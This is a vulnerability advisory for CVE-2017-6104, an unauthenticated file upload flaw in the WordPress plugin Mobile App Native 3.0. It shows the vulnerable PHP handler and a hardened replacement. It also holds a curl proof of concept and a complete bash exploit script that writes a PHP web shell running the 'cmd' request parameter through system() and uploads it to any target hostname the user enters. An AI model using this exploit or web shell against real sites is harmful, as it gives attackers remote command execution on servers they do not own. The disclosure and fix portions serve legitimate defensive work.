Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0

2017-03-03T00:00:00
ID SSV:92730
Type seebug
Reporter MYM
Modified 2017-03-03T00:00:00

Description

./zen-mobile-app-native/server/images.php: upload handler with no authentication check

The Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.

Vulnerability: The code in ./zen-mobile-app-native/server/images.php does not require authentication or check that the user is allowed to upload content. It also does not sanitize the uploaded file against executable code: the file is written to the web-accessible images/ directory with the extension taken from the client-supplied filename.

```php
<?php
//header('content-type: text/html; charset=iso-8859-2');
header('Content-Type: text/html; charset=utf-8');
header('Access-Control-Allow-Origin: *');
require_once('function.php');

if ($_FILES['file']['name']) {
    if (!$_FILES['file']['error']) {
        // No authentication or capability check has happened at this point.
        $name = md5(rand(100, 200));
        // The extension is copied from the client-supplied filename,
        // so "shell.php" is stored as <md5>.php.
        $ext = explode('.', $_FILES['file']['name']);
        $filename = $name . '.' . $ext[1];
        // The destination is inside the plugin tree, where PHP is executed.
        $destination = 'images/' . $filename;
        $location = $_FILES["file"]["tmp_name"];
        move_uploaded_file($location, $destination);
        echo $plugin_url.'/server/images/' . $filename;
    }
    else {
        echo $message = 'Ooops! Your upload triggered the following error: '.$_FILES['file']['error'];
    }
}
```
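As an added example (not the plugin's own code), a hardened replacement for images.php that closes the gaps described above: it requires an authenticated user with upload rights, binds the request to a nonce, and derives the extension from the file's contents against an image whitelist instead of from the client's filename. It assumes it runs inside a loaded WordPress; the nonce action name and the JSON response shape are assumptions.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for
// server/images.php. Assumes WordPress is loaded (wp_*, current_user_can());
// the nonce action name 'mobile_app_image_upload' is an assumption.
header('Content-Type: application/json; charset=utf-8');

function fail($status, $msg) {
    http_response_code($status);
    echo json_encode(['error' => $msg]);
    exit;
}

// 1. The original accepts uploads from anyone; require a logged-in user
//    who holds the upload_files capability.
if (!is_user_logged_in() || !current_user_can('upload_files')) {
    fail(403, 'forbidden');
}
// 2. Tie the request to a nonce so a third-party page cannot drive it
//    (the original even sent Access-Control-Allow-Origin: *).
if (!isset($_POST['_wpnonce'])
    || !wp_verify_nonce($_POST['_wpnonce'], 'mobile_app_image_upload')) {
    fail(403, 'bad nonce');
}
if (empty($_FILES['file']['tmp_name']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK
    || !is_uploaded_file($_FILES['file']['tmp_name'])) {
    fail(400, 'upload failed');
}
// 3. The original trusts the client-supplied extension ($ext[1]), so a
//    shell.php lands as .php. Decide the type from the file contents and
//    map it onto a fixed whitelist of image extensions.
$allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
$info = @getimagesize($_FILES['file']['tmp_name']);
if ($info === false || !isset($allowed[$info['mime']])) {
    fail(415, 'only JPEG, PNG or GIF images are accepted');
}
// 4. Server-chosen, unguessable name (md5(rand(100, 200)) yields only
//    101 possible names).
$filename = bin2hex(random_bytes(16)) . '.' . $allowed[$info['mime']];
// 5. Store under the WordPress uploads directory, not inside the plugin
//    tree; script execution there should also be disabled in the web
//    server configuration.
$upload = wp_upload_dir();
$destination = trailingslashit($upload['path']) . $filename;
if (!move_uploaded_file($_FILES['file']['tmp_name'], $destination)) {
    fail(500, 'could not store file');
}
echo json_encode(['url' => trailingslashit($upload['url']) . $filename]);
```

getimagesize() only inspects the image header, so a polyglot image carrying PHP would still pass the type check; the server-chosen extension and the no-execution rule on the upload directory are what keep such a file from ever running.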

CVE ID: CVE-2017-6104

PoC: upload a PHP file with curl; the handler echoes the URL under server/images/ where the file is now reachable with its md5-derived name:

```sh
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php"
http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php
```

Exploit script (https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh):

```bash
#!/bin/bash
#Exploit for the Wordpress Plugin Mobile App Native 3.0 file upload I posted.
#CVE-2017-6104
#Larry W. Cashdollar,@_larry0
#v1.0

cat > shell.php << -EOF-
<?php
if(isset(\$_REQUEST['cmd'])){
        echo "<pre>";
        \$cmd = (\$_REQUEST['cmd']);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do 
 echo -e ${red};
 echo -e "		Mobile App Native 3.0 File Upload PoC Redux $NC";
 echo "					3/1/2017";
 echo "			   Larry W. Cashdollar, @_larry0";
 echo
 echo "				  CVE-2017-6104";
 echo "- Advisory -";
 echo "http://www.vapid.dhs.org/advisory.php?v=178";
 echo
 echo "Ctrl ^C to exit";
 echo -n "Enter Target Hostname :";
 read target;
 echo "[+] Hostname $target";
 echo "[+] Exploiting Plugin";
 echo
 RESULT=`curl -# -F 'file=@shell.php' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`;
 echo "[==========================================================================]"
 echo $RESULT
 echo "[==========================================================================]"
done
```